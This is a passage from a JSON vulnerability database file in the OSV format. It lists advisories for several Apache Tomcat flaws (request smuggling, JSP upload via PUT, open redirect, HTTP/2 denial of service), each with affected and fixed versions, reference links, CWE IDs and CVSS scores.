8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.83" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.68" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0-M1" }, { "fixed": "10.0.27" } ] } ], "versions": [ "10.0.0", "10.0.0-M1", "10.0.0-M10", "10.0.0-M3", "10.0.0-M4", "10.0.0-M5", "10.0.0-M6", "10.0.0-M7", "10.0.0-M8", "10.0.0-M9", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.16", "10.0.17", "10.0.18", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.26", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.1" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.68" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0-M1" }, { "fixed": "10.0.27" } ] } ], "versions": [ "10.0.0", "10.0.0-M1", "10.0.0-M10", "10.0.0-M3", "10.0.0-M4", "10.0.0-M5", "10.0.0-M6", "10.0.0-M7", "10.0.0-M8", "10.0.0-M9", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.16", "10.0.17", "10.0.18", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.26", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.1" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42252" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0d089a15047faf9cb3c82f80f4d28febd4798920" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4c7f4fd09d2cc1692112ef70b8ee23a7a037ae77" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/a1c07906d8dcaf7957e5cc97f5cdbac7d18a205a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/c9fe754e5d17e262dfbd3eab2a03ca96ff372dc3" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/zzcxzvqfdqn515zfs3dxb7n8gty589sq" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-37" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2022-11-01T18:37:42Z", "nvd_published_at": "2022-11-01T09:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pjfr-qf3p-3q25", "published": "2018-10-17T16:30:31Z", "modified": "2025-10-22T19:26:58.224397Z", "aliases": [ "CVE-2017-12615" ], "summary": "When running Apache Tomcat on Windows with HTTP PUTs enabled it was possible to upload a JSP file to the server", "details": "When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.79" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-pjfr-qf3p-3q25/GHSA-pjfr-qf3p-3q25.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12615" }, { "type": "WEB", "url": "https://www.synology.com/support/security/Synology_SA_17_54_Tomcat" }, { "type": "WEB", "url": "https://www.exploit-db.com/exploits/42953" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-12615" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20171018-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/breaktoprotect/CVE-2017-12615" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-pjfr-qf3p-3q25" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0466" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0465" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3114" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3113" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3081" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3080" }, { "type": "WEB", "url": "http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/100901" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1039392" } ], "database_specific": { "cwe_ids": [ "CWE-434" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:49:21Z", "nvd_published_at": "2017-09-19T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q3mw-pvr8-9ggc", "published": "2023-08-25T21:30:48Z", "modified": "2025-08-08T19:07:33.521950Z", "aliases": [ "BIT-tomcat-2023-41080", "CVE-2023-41080" ], "related": [ "CGA-chc4-69mh-93g6" ], "summary": "Apache Tomcat Open Redirect vulnerability", "details": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92. Older, EOL versions may also be affected. The vulnerability is limited to the ROOT (default) web application.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M11" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.13" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.80" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.93" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.93" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.80" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.13" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M11" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41080" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4998ad745b67edeadefe541c94ed029b53933d3b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/77c0ce2d169efa248b64b992e547aad549ec906b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/bb4624a9f3e69d495182ebfa68d7983076407a27" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/e3703c9abb8fe0d5602f6ba8a8f11d4b6940815a" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/71wvwprtx2j2m54fovq9zr7gbm2wow2f" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230921-0006" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5521" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5522" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2023-08-25T22:05:01Z", "nvd_published_at": "2023-08-25T21:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q4hg-rmq2-52q9", "published": "2019-06-26T01:09:40Z", "modified": "2024-03-11T15:55:43.657670Z", "aliases": [ "CVE-2019-10072" ], "summary": "Improper Locking in Apache Tomcat", "details": "The fix for CVE-2019-0199 was incomplete and did not address HTTP/2 connection window exhaustion on write in Apache Tomcat versions 9.0.0.M1 to 9.0.19 and 8.5.0 to 8.5.40 . By not sending WINDOW_UPDATE messages for the connection window (stream 0) clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.20" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-q4hg-rmq2-52q9/GHSA-q4hg-rmq2-52q9.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.41" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-q4hg-rmq2-52q9/GHSA-q4hg-rmq2-52q9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10072" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0bcd69c9dd8ae0ff424f2cd46de51583510b7f35" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/7f748eb6bfaba5207c89dbd7d5adf50fae847145" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8d14c6f21d29768a39be4b6b9517060dc6606758" }, { "type": "WEB", "url": 